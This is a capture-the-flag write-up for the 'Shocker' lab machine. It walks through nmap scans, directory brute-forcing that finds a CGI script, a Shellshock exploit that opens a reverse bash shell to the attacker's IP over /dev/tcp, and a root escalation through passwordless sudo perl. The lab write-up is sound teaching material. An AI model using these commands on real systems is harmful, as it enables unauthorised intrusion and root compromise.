Nmap scan for basic ports
# Nmap 7.70 scan initiated Thu Jul 4 19:01:39 2019 as: nmap -oN T-common 10.10.10.56Nmap scan report for 10.10.10.56Host is up (0.25s latency).Not shown: 998 closed portsPORT STATE SERVICE80/tcp open http2222/tcp open EtherNetIP-1# Nmap done at Thu Jul 4 19:01:42 2019 -- 1 IP address (1 host up) scanned in 3.01 seconds
Detailed scan of the open ports
# Nmap 7.70 scan initiated Thu Jul 4 19:02:04 2019 as: nmap -sV -sC -p 80,2222 -oN O-Detailed 10.10.10.56Nmap scan report for 10.10.10.56Host is up (0.23s latency).PORT STATE SERVICE VERSION80/tcp open http Apache httpd 2.4.18 ((Ubuntu))|_http-server-header: Apache/2.4.18 (Ubuntu)|_http-title: Site doesn't have a title (text/html).2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)| ssh-hostkey:| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .# Nmap done at Thu Jul 4 19:02:18 2019 -- 1 IP address (1 host up) scanned in 14.65 seconds
Peculiar thing to note is that the SSH port has been moved to
2222 rather than the usual
dirb on the
http server first got us a directory,
cgi-bin, and running
dirb again fetched us a file named
The file displayed uptime information of the server. After some research and going by the name of the box I was very positive that this may involve shellshocking.
I found a tool online to automate the job - https://github.com/nccgroup/shocker
python shocker.py -H 10.10.10.56 --command "/bin/bash -i > /dev/tcp/10.10.14.13/9090 0<&1 2>&1" -c /cgi-bin/user.sh
This got me a reverse bash shell on my machine and I was able to
cat the flag.
> cat /home/shell/user.txt2ec24***
sudo -l on the machine mentioned that I can run
/usr/bin/perl as root without password.
I went over to GTFOBins and found that I can run a shell using
sudo perl -e 'exec "/bin/sh";'
This got a me a root shell and hence the root flag.
> cat /root/root.txt52c27***
I had never heard of Shell-shock on the web-server ever before so I learnt something new.